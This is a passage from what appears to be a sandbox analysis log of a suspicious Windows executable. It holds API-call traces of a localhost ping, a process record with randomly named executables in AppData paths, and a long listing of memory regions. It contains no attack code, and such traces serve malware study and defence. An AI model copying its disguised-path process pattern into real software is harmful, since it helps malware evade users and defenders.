(_FileHandle=1, _Mode=32768) returned 16384 [0101.395] _write (in: _FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x293c10) returned 0x0 [0101.395] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0101.395] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0101.395] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.395] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x298f20) returned 0x0 [0101.395] Sleep (dwMilliseconds=0x3e2) [0102.439] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, 
RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0102.751] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.751] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0102.751] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.751] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.751] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x295120) returned 0x0 [0102.752] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer="\x10<)") returned 0x9 [0102.752] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0102.752] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.752] _write (in: _FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x293c10) returned 0x0 [0102.752] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0102.752] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") 
returned 1 [0102.752] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.752] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x298f20) returned 0x0 [0102.752] Sleep (dwMilliseconds=0x3e8) [0103.830] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0103.984] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0103.985] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x295120) returned 0x0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer="\x10<)") returned 0x9 [0103.985] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: 
_FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x293c10) returned 0x0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0103.985] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x298f20) returned 0x0 [0103.985] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16f6a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x16f670, nSize=0x0, Arguments=0x16f66c | out: lpBuffer="\xd0\x14\x2a") returned 0x56 [0103.986] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2a14d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0103.986] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.986] _write (in: _FileHandle=1, _Buf=0x2a14d0*, _MaxCharCount=0x56 | out: _Buf=0x2a14d0*) returned 86 [0103.986] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.986] LocalFree (hMem=0x2a14d0) returned 0x0 [0103.986] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, 
lpBuffer=0x16f680, nSize=0x0, Arguments=0x16f67c | out: lpBuffer="\xe8\x14\x2a") returned 0x61 [0103.986] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 6ms, Average = 2ms\r\n", lpszDst=0x2a14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 6ms, Average = 2ms\r\n") returned 1 [0103.986] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.986] _write (in: _FileHandle=1, _Buf=0x2a14e8*, _MaxCharCount=0x61 | out: _Buf=0x2a14e8*) returned 97 [0103.986] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.986] LocalFree (hMem=0x2a14e8) returned 0x0 [0103.986] IcmpCloseHandle (IcmpHandle=0x298b40) returned 1 [0104.140] LocalFree (hMem=0x294830) returned 0x0 [0104.140] LocalFree (hMem=0x29ebb0) returned 0x0 [0104.140] WSACleanup () returned 0 [0104.234] exit (_Code=0) Thread: id = 44 os_tid = 0xc58 Thread: id = 45 os_tid = 0xc5c Thread: id = 46 os_tid = 0xc60 Process: id = "28" image_name = "sypykbck.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe" page_root = "0x7ea167c0" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xc0c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1756 start_va = 
0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1757 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1758 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1759 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1760 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1761 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1762 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1763 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1764 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1844 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1845 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1846 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" 
filename = "" Region: id = 1847 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1848 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1849 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1850 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1851 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1852 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1853 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1854 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1855 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1856 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1857 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1858 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1859 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1860 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1861 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1862 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1863 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1864 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1865 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file 
name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1886 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1887 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1888 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1889 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1890 start_va = 0x1270000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1891 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1892 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1893 start_va = 0x13b0000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1894 start_va = 0x1480000 end_va = 0x174efff entry_point = 0x1480000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1934 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1935 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = 
"profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2059 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2060 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 2061 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 2062 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2063 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2064 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2065 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2066 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2067 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2068 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2069 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2070 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2071 start_va = 
0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2072 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2073 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2074 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2075 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2076 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2077 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2078 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2079 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2080 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2081 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2082 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2083 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 
2084 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2085 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2086 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2087 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2088 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2089 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2090 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2091 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2092 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2093 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2094 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2095 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2096 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = 
"" Region: id = 2097 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2098 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2099 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2100 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2101 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2102 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2103 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2104 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2105 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2106 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2107 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2108 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2109 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 2110 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2111 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2112 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 2113 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 2114 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2115 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2116 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2117 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2118 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2119 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2120 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2121 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2122 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2123 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2124 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2125 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2126 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2127 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2128 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2129 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2130 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2131 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 